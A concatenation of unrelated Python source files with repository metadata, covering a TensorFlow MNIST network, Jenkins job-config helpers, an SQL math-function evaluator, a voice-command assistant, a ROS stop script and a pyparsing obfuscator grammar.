MOVING_AVERAGE_DECAY = 0.99 # moving-average decay rate
def inference(input_tensor, avg_class, weights1, biases1, weights2, biases2):
    """Forward pass of the two-layer ReLU network; returns output logits.

    When ``avg_class`` is None the raw variables are used; otherwise the
    moving-average shadow values from ``avg_class`` are used instead.
    """
    if avg_class is None:
        layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)
        return tf.matmul(layer1, weights2) + biases2
    else:
        # BUG FIX: the hidden layer previously multiplied the input by the
        # moving average of weights2 instead of weights1.
        layer1 = tf.nn.relu(
            tf.matmul(input_tensor, avg_class.average(weights1)) +
            avg_class.average(biases1))
        # BUG FIX: the average of biases2 was previously added to the
        # weight matrix *inside* the matmul instead of to its result.
        return (tf.matmul(layer1, avg_class.average(weights2)) +
                avg_class.average(biases2))
def train(mnist):
    """Build the training graph for the MNIST network.

    NOTE(review): the stored file appears truncated — the loss, optimizer
    and training loop are missing after the moving-average op below.
    """
    x = tf.placeholder(tf.float32, [None, INPUT_NODE], name='x-input')
    y_ = tf.placeholder(tf.float32, [None, OUTPUT_NODE], name='y-input')
    # Hidden-layer parameters.
    weights1 = tf.Variable(
        tf.truncated_normal([INPUT_NODE, LAYER1_NODE], stddev=0.1))
    biases1 = tf.Variable(tf.constant(0.1, shape=[LAYER1_NODE]))
    # Output-layer parameters.
    weights2 = tf.Variable(
        tf.truncated_normal([LAYER1_NODE, OUTPUT_NODE], stddev=0.1))
    biases2 = tf.Variable(tf.constant(0.1, shape=[OUTPUT_NODE]))
    # Forward pass without moving averages (avg_class=None).
    y = inference(x, None, weights1, biases1, weights2, biases2)
    # Non-trainable step counter driving the moving-average decay schedule.
    global_step = tf.Variable(0, trainable=False)
    variable_averages = tf.train.ExponentialMovingAverage(
        MOVING_AVERAGE_DECAY, global_step)
    variable_averages_op = variable_averages.apply(tf.trainable_variables())
| [
"zhounan157@163.com"
] | zhounan157@163.com |
2b8c95450b6dafc15c3eb213a1f25e67cc7da7f2 | 59b4d74dbb9439274ec799f7c371dc0f606d6812 | /app/main.py | 81ff453a790eb816aa23c8462adf760780d732c6 | [] | no_license | gitzjm/ming-blog-backend | da33291e029c5af52a659ff86815d16df48051d1 | 32493e0d7aa78ff202b742c7c490882301806cbf | refs/heads/master | 2022-12-02T16:06:01.930097 | 2020-08-21T09:48:09 | 2020-08-21T09:48:09 | 288,148,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | # coding=UTF-8
"""``main``
"""
import uvicorn
from core.conf import conf
if __name__ == "__main__":
    # Launch the ASGI app; host/port/debug all come from the project config.
    uvicorn.run(
        "app:app",
        host=conf.server.host,
        port=int(conf.server.port),
        log_level="info",
        debug=bool(conf.server.debug)
    )
| [
"zhaojunming@ninstarscf.com"
] | zhaojunming@ninstarscf.com |
d00bbbb216b7a6dd68e5e30782867450683596a9 | af4abf0a22db1cebae466c56b45da2f36f02f323 | /parser/fase2/team17/Traduccion/Interprete/SELECT/Select_simples.py | 470eb54c24056715c25c9bffd423dd943a3e791e | [
"MIT"
] | permissive | joorgej/tytus | 0c29408c09a021781bd3087f419420a62194d726 | 004efe1d73b58b4b8168f32e01b17d7d8a333a69 | refs/heads/main | 2023-02-17T14:00:00.571200 | 2021-01-09T00:48:47 | 2021-01-09T00:48:47 | 322,429,634 | 3 | 0 | MIT | 2021-01-09T00:40:50 | 2020-12-17T22:40:05 | Python | UTF-8 | Python | false | false | 5,528 | py | from Interprete.NodoAST import NodoArbol
from Interprete.Tabla_de_simbolos import Tabla_de_simbolos
from Interprete.Arbol import Arbol
from Interprete.Valor.Valor import Valor
from Interprete.Primitivos.TIPO import TIPO
from Interprete.SELECT.indexador_auxiliar import indexador_auxiliar
from Interprete.SELECT.indexador_auxiliar import IAT
from Interprete.simbolo import Simbolo
import math
import random
class Select_simples(NodoArbol):
    """AST node evaluating SQL scalar math functions.

    ``self.exp`` is a single expression node, or a list of two nodes for
    binary functions (GCD, MOD, POWER, ROUND, DIV); ``self.tipo`` names
    the function.  ``execute`` returns a ``Valor`` of type ``TIPO.DECIMAL``
    (or None for an unknown ``tipo``, as before).
    """
    def __init__(self, exp, tipo, line, coliumn):
        super().__init__(line, coliumn)
        self.exp = exp
        self.tipo = tipo

    def _float(self, node, entorno, arbol):
        # Evaluate a child node and coerce its payload to float.
        value: Valor = node.execute(entorno, arbol)
        return float(str(value.data))

    def _int(self, node, entorno, arbol):
        # Evaluate a child node and coerce its payload to int.
        value: Valor = node.execute(entorno, arbol)
        return int(str(value.data))

    def execute(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        if self.tipo == "FACTORIAL":
            return Valor(TIPO.DECIMAL, math.factorial(self._int(self.exp, entorno, arbol)))
        elif self.tipo == "FLOOR":
            return Valor(TIPO.DECIMAL, math.floor(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "GCD":
            a = self._int(self.exp[0], entorno, arbol)
            b = self._int(self.exp[1], entorno, arbol)
            return Valor(TIPO.DECIMAL, math.gcd(a, b))
        elif self.tipo == "LN":
            # BUG FIX: SQL LN(x) is the *natural* logarithm; the original
            # used math.log10 here.
            return Valor(TIPO.DECIMAL, math.log(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "LOG":
            # BUG FIX: SQL LOG(x) is the base-10 logarithm; the original
            # used math.log (base e) here.
            return Valor(TIPO.DECIMAL, math.log10(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "MOD":
            a = self._int(self.exp[0], entorno, arbol)
            b = self._int(self.exp[1], entorno, arbol)
            return Valor(TIPO.DECIMAL, a % b)
        elif self.tipo == "PI":
            return Valor(TIPO.DECIMAL, math.pi)
        elif self.tipo == "POWER":
            base = self._int(self.exp[0], entorno, arbol)
            exponent = self._int(self.exp[1], entorno, arbol)
            return Valor(TIPO.DECIMAL, base ** exponent)
        elif self.tipo == "RADIANS":
            return Valor(TIPO.DECIMAL, math.radians(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "ROUND":
            value = self._float(self.exp[0], entorno, arbol)
            digits = self._int(self.exp[1], entorno, arbol)
            return Valor(TIPO.DECIMAL, round(value, digits))
        elif self.tipo == "SIGN":
            # BUG FIX: SIGN(0) previously returned -1; SQL defines it as 0.
            value = self._float(self.exp, entorno, arbol)
            v = 1 if value > 0 else (-1 if value < 0 else 0)
            return Valor(TIPO.DECIMAL, v)
        elif self.tipo == "SQRT":
            return Valor(TIPO.DECIMAL, math.sqrt(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "TRUNC":
            return Valor(TIPO.DECIMAL, math.trunc(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "RANDOM":
            return Valor(TIPO.DECIMAL, random.randrange(1024))
        elif self.tipo == "CBRT":
            return Valor(TIPO.DECIMAL, self.CBRT(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "CEIL":
            return Valor(TIPO.DECIMAL, math.ceil(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "DEGREES":
            return Valor(TIPO.DECIMAL, math.degrees(self._float(self.exp, entorno, arbol)))
        elif self.tipo == "DIV":
            # Integer division truncated toward zero (int() truncates).
            a = self._int(self.exp[0], entorno, arbol)
            b = self._int(self.exp[1], entorno, arbol)
            return Valor(TIPO.DECIMAL, int(a / b))
        elif self.tipo == "EXP":
            return Valor(TIPO.DECIMAL, math.exp(self._float(self.exp, entorno, arbol)))

    def CBRT(self, n):
        """Real cube root.

        BUG FIX: ``n ** (1/3)`` yields a complex number for negative n in
        Python 3; mirror the sign onto the root of the absolute value.
        """
        return math.copysign(abs(n) ** (1. / 3.), n)
"jm7740779@gmail.com"
] | jm7740779@gmail.com |
9d3f9d143b195b5f1bef682c639bc5c98f28425c | 326bb8dad81acd1d90255967d76097f5fedd038d | /task6.py | efd9dbe87ca817674896d5099076f3161f995437 | [] | no_license | yuki-kasahara/nus966-readable-code | 50d7cd5add593b2ce7c20df4e45f36b31ed92488 | 713d626c1b6ef9d59a3829692f30aa3312c66149 | refs/heads/main | 2023-07-28T01:55:09.890592 | 2021-09-14T05:53:50 | 2021-09-14T05:53:50 | 406,227,655 | 0 | 1 | null | 2021-09-14T04:48:49 | 2021-09-14T04:48:48 | null | UTF-8 | Python | false | false | 380 | py | import sys
import pandas as pd
args = sys.argv
dictionary = pd.read_csv("dictionary.csv")
# 引数が無ければすべて出力, IDが指定されていれば指定IDの単語出力
if len(args) <= 1:
for id_, word in zip(dictionary['ID'],dictionary['単語']):
print(str(id_) + ':' + word)
else:
print(args[1] + ':' + str(dictionary['単語'][int(args[1])])) | [
"kassan182tec@gmail.com"
] | kassan182tec@gmail.com |
da133734e4a1cdb645608157f9a0e331a43bcc6d | 9ce4f67e2b592bf2573227c8e62734a07c7998c1 | /param.py | 4083ba2d7b6cbc3667729341bc7e3e39766a43d0 | [] | no_license | cobbxia/jjiepanmen | 1a0db5ae130e3a6f7ab722a2572e674d80599259 | a4ce035266155b927a310ab8426b520a5912a67f | refs/heads/master | 2020-06-12T07:25:04.507536 | 2016-12-12T02:46:25 | 2016-12-12T02:46:25 | 75,597,467 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,313 | py | '''
This file contains jenkins api
'''
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append("./pkg")
sys.path.append("./pkg/jenkinsapi")
sys.path.append("./pkg/pytz")
sys.path.append("./pkg/requests")
import jenkinsapi
from jenkinsapi.jenkins import Jenkins
import json
import xml.etree.ElementTree as Etree
import cfg
import time
from tree import Node
import Queue
import threading
import ConfigParser
import jenkins
from util import detect_reg
class myconf(ConfigParser.ConfigParser):
    """ConfigParser subclass that preserves option-name case.

    The stock parser lower-cases option names via ``optionxform``; Jenkins
    parameter names are case-sensitive, so the transform is disabled.
    """
    def __init__(self,defaults=None):
        # BUG FIX: the received ``defaults`` were previously discarded
        # (the base class was always initialised with defaults=None).
        ConfigParser.ConfigParser.__init__(self,defaults=defaults)
    def optionxform(self, optionstr):
        # Return the option name unchanged instead of lower-casing it.
        return optionstr
def printnode(nodes):
    """Debug helper: dump tag, attribute dict and text for each XML node."""
    for elem in nodes:
        print(elem.tag, elem.attrib, elem.text)
def get_job_cfgparam(groupname, jobname):
    """Fetch the 'config' text build parameter of a Jenkins job.

    Downloads the job's config.xml, locates the TextParameterDefinition
    named "config", dumps its default value to <jobname>.conf and returns
    it parsed as a case-preserving ConfigParser (myconf).

    Returns None when the job has no <properties> section; returns nothing
    (None) when there is no "config" parameter.
    """
    print(groupname, jobname)
    paramconffile = "%s.conf" % (jobname)
    jkserver = jenkins.API().get_jenkins_instance()
    job = jkserver.get_job(jobname)
    jobconfig = job.get_config()
    tree = Etree.fromstring(jobconfig)
    pnodes = tree.findall("./properties")
    printnode(pnodes)
    if not pnodes:
        return None
    pnode = pnodes[0]
    print(pnode)
    textParamNodes = pnode.find("hudson.model.ParametersDefinitionProperty").find("parameterDefinitions").findall("hudson.model.TextParameterDefinition")
    printnode(textParamNodes)
    confignode = None
    for node in textParamNodes:
        print(node)
        if node.find('name').text == "config":
            confignode = node
    # BUG FIX: the original tested 'confignode != Node', comparing against the
    # imported tree.Node class, which is always true; a job without a "config"
    # parameter then crashed with AttributeError instead of being reported.
    if confignode is None:
        print("config node is empty")
        return
    outmancfg = confignode.find("defaultValue").text
    print("cfg:%s" % outmancfg)
    # Dump the raw config text, then parse it back with the case-preserving
    # parser so callers get structured access.
    with open(paramconffile, "w") as cfgfile:
        cfgfile.write(outmancfg)
    cf = myconf()
    cf.read(paramconffile)
    return cf
def add_job_cfgparam(groupname, jobname, section, option, val, isupdate=False):
    """Set <section>/<option>=<val> inside a job's "config" text parameter.

    Reads the job's current "config" parameter, updates the given option in
    the local <jobname>.conf copy, and -- when isupdate is True -- writes the
    modified config back to Jenkins via job.update_config().

    Returns the updated myconf instance, or None when the job has no
    <properties> section / no "config" parameter.
    """
    print(groupname, jobname)
    paramconffile = "%s.conf" % (jobname)
    jkserver = jenkins.API().get_jenkins_instance()
    job = jkserver.get_job(jobname)
    jobconfig = job.get_config()
    tree = Etree.fromstring(jobconfig)
    pnodes = tree.findall("./properties")
    printnode(pnodes)
    if not pnodes:
        return None
    pnode = pnodes[0]
    print(pnode)
    textParamNodes = pnode.find("hudson.model.ParametersDefinitionProperty").find("parameterDefinitions").findall("hudson.model.TextParameterDefinition")
    printnode(textParamNodes)
    confignode = None
    for node in textParamNodes:
        print(node)
        if node.find('name').text == "config":
            confignode = node
    # BUG FIX: the original tested 'confignode != Node' (the tree.Node class),
    # which is always true, so a missing "config" parameter crashed with
    # AttributeError instead of printing the diagnostic.
    if confignode is None:
        print("config node is empty")
        return
    outmancfg = confignode.find("defaultValue").text
    print("cfg:%s" % outmancfg)
    with open(paramconffile, "w") as cfgfile:
        cfgfile.write(outmancfg)
    cf = myconf()
    cf.read(paramconffile)
    # add_section before set when the section is new; set() is common to both.
    if not cf.has_section(section):
        cf.add_section(section)
    cf.set(section, option, val)
    # FIX: the original passed a never-closed file object to cf.write().
    with open(paramconffile, "w") as cfgfile:
        cf.write(cfgfile)
    if isupdate == True:
        with open(paramconffile, "r") as cfgfile:
            confignode.find("defaultValue").text = "".join(cfgfile.readlines())
        if cfg.debug == True:
            print(confignode.find("defaultValue").text)
        with open("%s.xml" % (jobname), "w") as xmlfile:
            xmlfile.write(Etree.tostring(tree))
        job.update_config(Etree.tostring(tree))
    return cf
def get_element_children(element):
    """Return a list of *element*'s direct children, or None when *element* is None."""
    if element is None:
        print('the element is None!')
        return None
    if cfg.debug:
        print('begin to handle the element : [{}]'.format(element))
    return list(element)
def get_job_slave(groupname,jobname):
    # Return the <assignedNode> (slave label) from the job's config.xml.
    # groupname is accepted for API symmetry but not used here.
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    jobconfig = job.get_config()
    tree = Etree.fromstring(jobconfig)
    roamnode = tree.findall("./canRoam")
    if roamnode != None:
        # Pin the job to a node (disable roaming) in the in-memory tree only;
        # the modified tree is never written back to Jenkins here.
        roamnode[0].text="false"
    nodes = tree.findall("./assignedNode")
    print nodes
    if nodes == None or len(nodes)==0:
        # NOTE(review): 'slave' is not defined in this function, so this
        # branch raises NameError at runtime; it also returns None without
        # persisting the appended element -- looks like dead/leftover code.
        tree.append(Etree.fromstring('<assignedNode>'+slave+'</assignedNode>'))
    else:
        node = nodes[0]
        print(node.text)
        return node.text
def get_job_xml(groupname,jobname):
    # Print the raw config.xml of a job (debug helper).
    #phelp()
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    jobxml=job.get_config()
    print(jobxml)
'''
waiting until job done
'''
def build_job_poll(jobname,params=None):
    # Trigger a build with block=True and poll until the job leaves the
    # queue / stops running (blocking variant of build_job below).
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    if params==None:
        params={'block':True}
    else:
        params['block']=True
    try:
        print 'startjob===>'+jobname
        response = jkserver.build_job(jobname, params)
        print response
        print 'waiting build'
        while(job.is_queued_or_running()):
            time.sleep(1)
        time.sleep(1)
        print 'finish'
    except Exception,e:
        print e
'''
trigger the job and exits
'''
def build_job(jobname, params=None):
    # Fire-and-forget build trigger; errors are printed, not raised.
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    try:
        print 'startjob===>'+jobname
        response = jkserver.build_job(jobname, params)
    except Exception,e:
        print e
def get_job_child(groupname,jobname):
    # Print the comma-separated downstream (child) project list configured
    # via the hudson.tasks.BuildTrigger publisher.
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    jobconfig = job.get_config()
    tree = Etree.fromstring(jobconfig)
    children = tree.find("publishers").find("hudson.tasks.BuildTrigger").find("childProjects").text
    print(children)
'''
generate module name and jenkins job dict
'''
def gendict(gname, jobname):
    """Write one '<module>:<jenkins job>' line per module of group *gname*."""
    m2jdict = {}
    srcfile = "%s_module_list.txt" % (gname)
    dstfile = "%s_module2jenkins.txt" % (gname)
    with open(srcfile, "r") as srcfp, open(dstfile, "w") as dstfp:
        for raw in srcfp:
            mname = raw.strip("\n")
            dstfp.write("%s:%s\n" % (mname, detect_reg(gname, mname)))
def get_child_job(gname,jobname):
    # Build a list of {jobname, slave} dicts for a job and its downstream
    # children.
    m2jdict=loadm2jdict(gname)
    joblist=[]
    jobdict={}
    jobdict["jobname"]=jobname
    slave=get_job_slave(gname,jobname)
    jobdict["slave"]=slave
    joblist.append(jobdict)
    # NOTE(review): 'get_job_children' is not defined anywhere in this file
    # (only 'get_job_child', which prints and returns None) -- this call
    # raises NameError at runtime; presumably a renamed helper. TODO confirm.
    children=get_job_children(gname,jobname)
    if children != "":
        for child in children.split(","):
            slave=get_job_slave(gname,child)
            childdict={"jobname":child,"slave":slave}
            # NOTE(review): 'filterdict' is undefined in this scope, and the
            # non-empty branch never returns joblist -- likely leftover code.
            filterdict.append(child)
            joblist.append(childdict)
    else:
        return joblist
'''
get all jenkins jobname and slave in one group
'''
def getAllJob(gname,jobname):
    # Collect {slave, jobname} for every module of the group and dump the
    # whole list as JSON to <gname>.txt.
    m2jdict=loadm2jdict(gname)
    filterdict={}
    allJobList=[]
    for mname in m2jdict:
        joblist=[]
        jobdict={}
        # The jobname parameter is shadowed here by the per-module job name.
        jobname=m2jdict[mname]
        if jobname is None or jobname == "None":
            print("module:%s not found" % mname)
            continue
        slave=get_job_slave(gname,jobname)
        jobdict["slave"]=slave
        jobdict["jobname"]=jobname
        joblist.append(jobdict)
        allJobList.append(joblist)
    encodedjson = json.dumps(allJobList)
    print(encodedjson)
    open("%s.txt" % (gname),"w").write(encodedjson)
def loadm2jdict(gname):
    """Load the '<group>_module2jenkins.txt' mapping file into a dict."""
    mapping = {}
    srcfile = "%s_module2jenkins.txt" % (gname)
    with open(srcfile, "r") as fp:
        for raw in fp:
            entry = raw.strip("\n")
            if cfg.debug == True:
                print(entry)
            key, val = entry.split(":")
            mapping[key] = val
    return mapping
def modify_branch(jobname,new_branch):
    # Change the SCM branch of one Jenkins job; prints the branch before and
    # after the change. Skips placeholder job names ("None"/None).
    print(jobname)
    if jobname=="None" or jobname is None :
        return
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    try:
        branch=job.get_scm_branch()
    except Exception,e:
        # Jobs without SCM configuration are skipped silently (best effort).
        print e
        return
    print(branch)
    job.modify_scm_branch(new_branch)
    branch=job.get_scm_branch()
    print(branch)
def batch_scm_modify(gname, new_branch):
    '''
    modify scm branch in batch,groupname and new_branch
    "5ktest" "*/release/20151230_sprint21"
    '''
    # BUG FIX: the original immediately overwrote new_branch with
    # cfg.new_branch, silently ignoring the branch passed by callers
    # (e.g. modify_5k_scm). Use the argument as documented above.
    srcfile = "%s_module2jenkins.txt" % (gname)
    for line in open(srcfile, "r"):
        jobname = line.strip("\n").split(":")[1]
        if jobname is None or jobname == "" or jobname == "None":
            continue
        modify_branch(jobname, new_branch)
def modify_5k_scm():
    # Convenience wrapper: point every 5ktest job at the sprint21 branch.
    gname="5ktest"
    new_branch="*/release/20151230_sprint21"
    batch_scm_modify(gname,new_branch)
'''
'''
def get_cfg(jobname):
    # Debug helper: print a job's raw config.xml.
    print(jobname)
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    print(job.get_config())
def rerun(groupname,jobname,block=True):
    # Re-trigger an "outman" job with runtime/failed=True injected into its
    # "config" parameter. block=True waits for completion (build_job_poll),
    # otherwise fire-and-forget (build_job).
    #jobname="mztest_git"
    #groupname="5ktest"
    secname="runtime"
    optname="failed"
    val="True"
    params={}
    cf=add_job_cfgparam(groupname,jobname,secname,optname,val)
    paramconffile="%s.conf" % (jobname)
    # Pass the updated config file content as the job's "config" parameter.
    params["config"]="".join(open(paramconffile,"r").readlines())
    #print(params["config"])
    if jobname.lower().find("outman") >=0:
        if block==True:
            build_job_poll(jobname, params)
        else:
            build_job(jobname, params)
    else:
        print("job:%s not outman,cann't rerun" % (jobname))
class Rerun:
    """Helper for re-running failed outman jobs of one fuzzer group.

    On construction it loads the group's module-to-jenkins-job mapping file
    ('<group>_module2jenkins.txt', one 'module:job' pair per line) into
    self.m2jdict.
    """
    def __init__(self, gname):
        # BUG FIX: the original signature was __init__(gname) -- it was
        # missing 'self', so Rerun(...) always raised TypeError and the
        # body's self.* assignments could never have worked.
        self.gname = gname
        self.m2jfile = "%s_module2jenkins.txt" % (self.gname)
        self.mlist = []          # modules of interest (currently unused)
        self.failJobList = []    # failed job names (filled by future logic)
        self.m2jdict = {}
        with open(self.m2jfile, "r") as fp:
            for line in fp:
                line = line.strip("\n")
                parts = line.split(":")
                self.m2jdict[parts[0]] = parts[1]

    def get_fail_jobname(self):
        # Placeholder: intended to collect today's failed job names.
        today = time.strftime('%Y-%m-%d', time.localtime(time.time()))
        for mname in self.m2jdict:
            pass
def batch_modify_endpoint(gname):
    # Clear the 'end_point' option (empty section "") in the "config"
    # parameter of every outman job of the group, pushing the change back
    # to Jenkins (isupdate=True). Non-outman jobs are printed and skipped.
    for line in open("%s_module2jenkins.txt" % (gname),"r"):
        line =line.strip("\n")
        jobname=line.split(":")[1]
        if jobname.lower().find("outman") < 0:
            print(jobname)
            continue
        isupdate=True
        section=""
        option="end_point"
        val=""
        try:
            add_job_cfgparam(gname,jobname,section,option,val,isupdate)
        except Exception,e:
            # Best effort: keep iterating the remaining jobs on failure.
            print e
def batch_modify_clt(gname):
    # Point 'client/console_download' of every outman job at the console URL
    # from cfg.newdailyrunconsole, pushing the change back to Jenkins.
    for line in open("%s_module2jenkins.txt" % (gname),"r"):
        line =line.strip("\n")
        jobname=line.split(":")[1]
        if jobname.lower().find("outman") < 0:
            print(jobname)
            continue
        isupdate=True
        section="client"
        option="console_download"
        val=cfg.newdailyrunconsole
        try:
            add_job_cfgparam(gname,jobname,section,option,val,isupdate)
        except Exception,e:
            print e
def get_build_status(jobname):
    # Debug helper: print the job's build-number -> build mapping.
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    builddict=job.get_build_dict()
    print(builddict)
def get_last_console(jobname):
    # Dump the console output of the job's last build to content.txt.
    jkserver=jenkins.API().get_jenkins_instance()
    job=jkserver.get_job(jobname)
    build=job.get_last_build()
    content=build.get_console()
    open("content.txt","w").write(content)
if __name__ == '__main__':
    # Script entry point: clear endpoints for the "release" group.
    gname="release"
    batch_modify_endpoint(gname)
| [
"mingchao.xiamc@alibaba-inc.com"
] | mingchao.xiamc@alibaba-inc.com |
0adba5da91a33419ea09749723d1a920e81a0c9b | 03041e8ea52da1ead0257eb5155864c8456d569c | /iosis.py | dd9f18d4d0504ab52288baa88111be36a0f1a4dc | [] | no_license | AbhijeetSasmal1512/DemoAssistant | ce70550dea74bc49b738efd4282b1f3e1944b90a | cc3f25abab767a2cd86b1cb1bacdecbd1e3d8a95 | refs/heads/master | 2020-12-03T01:06:55.863285 | 2020-01-01T02:57:36 | 2020-01-01T02:57:36 | 231,168,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | #!/usr/bin/python2.7
import speech
import text
import os
import sqlite3
import logging
# Module-level setup: open the command database, greet the user, capture one
# spoken command (lower-cased), and configure logging.
conn = sqlite3.connect('/home/abhijeet/Documents/Assistant/command.db')
speech.speak("Hello, I am Enori. What can I do for you today?")
command = text.stt()
command = command.lower()
logging.basicConfig(filename='iosis.log',level=logging.INFO)
def createTable(conn):
    """Create the COMMAND table (id, speech trigger, shell command, spoken answer)."""
    ddl = '''CREATE TABLE COMMAND
         (ID INTEGER PRIMARY KEY AUTOINCREMENT,
         SPEECH           TEXT    NOT NULL,
         CMD            TEXT     NOT NULL,
         ANSWER        TEXT     NOT NULL);'''
    conn.execute(ddl)
    print("Table created")
def addCommand(conn, speech, cmd, answer):
    """Insert a new voice command row (speech trigger, shell cmd, answer) and commit.

    SECURITY FIX: the original interpolated the values straight into the SQL
    text with %-formatting, so any apostrophe in the spoken text broke the
    statement and arbitrary SQL could be injected. Use bound parameters.
    """
    query = "INSERT INTO COMMAND (SPEECH,CMD,ANSWER) VALUES (?, ?, ?);"
    conn.execute(query, (speech, cmd, answer))
    conn.commit()
def findAllCommand(conn):
    """Return a cursor over the SPEECH column of every stored command."""
    return conn.execute("SELECT SPEECH FROM COMMAND")
def findCommand(conn, speech):
    """Return a cursor yielding (CMD, ANSWER) rows whose SPEECH matches exactly.

    SECURITY FIX: the original built the WHERE clause with %-interpolation,
    which broke on apostrophes and allowed SQL injection. Use a bound
    parameter instead; log the query plus the looked-up speech.
    """
    query = "SELECT CMD, ANSWER FROM COMMAND WHERE SPEECH = ?"
    logging.info("%s [speech=%r]", query, speech)
    return conn.execute(query, (speech,))
def Action():
    # Dispatch the globally captured 'command': record a new command, open a
    # terminal, or run a stored command and speak its answer.
    if("command" in command):
        # Interactive registration of a new voice command.
        sp = raw_input("Enter the speech of the command : ")
        cmd = raw_input("Enter the command : ")
        answer = raw_input("Enter the answer of the command : ")
        addCommand(conn, sp, cmd, answer)
    elif command == 'open terminal':
        os.system('gnome-terminal')
        speech.speak('Opening Terminal')
    elif len(findCommand(conn, command).fetchall()) != 0:
        # Known command: run each stored shell command and speak its answer.
        # NOTE(review): findCommand is executed twice (existence check +
        # iteration) -- a single fetchall() would do.
        action = findCommand(conn, command)
        for row in action:
            os.system(row[0])
            speech.speak(row[1])
    else:
        print "Unable to process"
try:
    Action()
except:
    # NOTE(review): bare except hides the real error; it only logs a marker
    # plus the command and speaks a generic failure message.
    logging.info("hello")
    logging.info(command)
    speech.speak("Unable to process the Information")
| [
"abhijeetsasmal4@gmail.com"
] | abhijeetsasmal4@gmail.com |
ec7a336d36360b63b1ea14ba97b47d6294826dcb | ecb6959f545e3a56691efba917ddfdf3217fd14f | /src/sigint_catcher.py | 677472dfa9b2647251665c4746dcfc04a011e2f1 | [] | no_license | campusrover/gen5 | 1c15aa809e2ed3877e4e81aace3fb0cab73260df | c225f56c4e92bf5ad1d35018d67f25e2fdcfebd8 | refs/heads/master | 2022-11-01T07:53:43.658999 | 2020-06-15T21:36:22 | 2020-06-15T21:36:22 | 244,982,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #!/usr/bin/env python
import rospy
import signal
import sys
from geometry_msgs.msg import Twist
'''stops the robot when the program is remotely interrupted'''
def signal_handler(sig, frame):
    # SIGINT handler: publish a zero-velocity Twist (all fields default to 0)
    # so the Turtlebot3 stops, then exit the process.
    print('Stopping Turtlebot3...')
    twist = Twist()
    cmd_vel.publish(twist)
    print('Exit program...')
    sys.exit(0)
# Register the node, the /cmd_vel publisher used by the handler, install the
# SIGINT handler, and sleep until a signal arrives.
rospy.init_node('sigint_catcher')
cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size = 1)
signal.signal(signal.SIGINT, signal_handler)
signal.pause()
"danbing123@gmail.com"
] | danbing123@gmail.com |
d9b86a2d17b2af62a0ab7bc718273c678c98a0ad | eafe44014fb8e3f4539c729e5bcd8ecc2fe71743 | /ifg_front/dili_api/apps.py | 1238c08bb1b3c88c1b323e8716055992beb03410 | [] | no_license | smilebulee/infogen_ims | 83deede19bdf4daf7784280da085ecd36030efa7 | a9feb634657fba93f46f2b902004a6c14a37f4c3 | refs/heads/master | 2023-05-28T07:29:55.586051 | 2023-05-24T07:50:13 | 2023-05-24T07:50:13 | 245,916,505 | 2 | 7 | null | 2023-02-15T17:51:38 | 2020-03-09T01:17:04 | JavaScript | UTF-8 | Python | false | false | 90 | py | from django.apps import AppConfig
class DiliApiConfig(AppConfig):
    # Django app configuration for the 'dili_api' application.
    name = 'dili_api'
| [
"bulee@infogen.co.kr"
] | bulee@infogen.co.kr |
5797a16c125952321a989b028c6032123109f0c2 | 3ed5562cca39fb76c3fe67d4c2c3952851c2d11b | /logic/obfuscatefile/obfuscatepythonbnf.py | e5d70c616c98b7abd042bc66541659791f36dea9 | [
"MIT"
] | permissive | blacknoize404/pymixup | f754aa6f8c9e50d2560f6e54a4a3810d35ac9c90 | 9004fbdc7939033014b0eefa669056014647a0c8 | refs/heads/master | 2021-12-09T19:26:49.517470 | 2016-06-09T19:01:04 | 2016-06-09T19:01:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,988 | py | from peewee import DoesNotExist
from pyparsing import Literal, Optional, ZeroOrMore
from logic.obfuscatefile import ObfuscateBNF
from logic.reserved import add_reserveds, get_reserved_by_name
from logic.utilities import obfuscate_path
class ObfuscatePythonBNF(ObfuscateBNF):
    """Pyparsing grammar and parse actions for obfuscating Python sources."""
    def __init__(self, get_obfuscated):
        """BNF grammar for Python source statements.
        Parameters
        ----------
        get_obfuscated : function
            Function to return the obfuscated name for an identifier.
        """
        super(ObfuscatePythonBNF, self).__init__(get_obfuscated)
        # '@validate("...", "...")' decorator form.
        self.validator = \
            Literal('@') + \
            Literal('validate') + \
            Literal('(') + \
            self.string + \
            self.string + \
            Literal(')')
        # Parse a Kivy load_file statement
        self.builder = \
            Literal('Builder.load_file(') + \
            self.string + \
            Literal(')')
        # Generic statement: any mix of the base-grammar tokens, with a
        # trailing comment stripped.
        self.statement = (
            ZeroOrMore(
                (self.directive |
                 self.builder |
                 self.tab |
                 self.conseq_idents_numbs |
                 self.separator |
                 self.string_or_doc |
                 self.triple_quote)
            ) + Optional(self.comment).suppress()
        )
        # 'except SomeError ...' lines: only 'except' and identifiers are
        # kept; everything else is suppressed.
        self.except_error = (
            ZeroOrMore(
                (self.tab.suppress() |
                 Literal('except') |
                 self.directive.suppress() |
                 self.tab.suppress() |
                 self.ident |
                 self.separator.suppress() |
                 self.fnumber.suppress() |
                 self.string_or_doc.suppress() |
                 self.triple_quote.suppress())
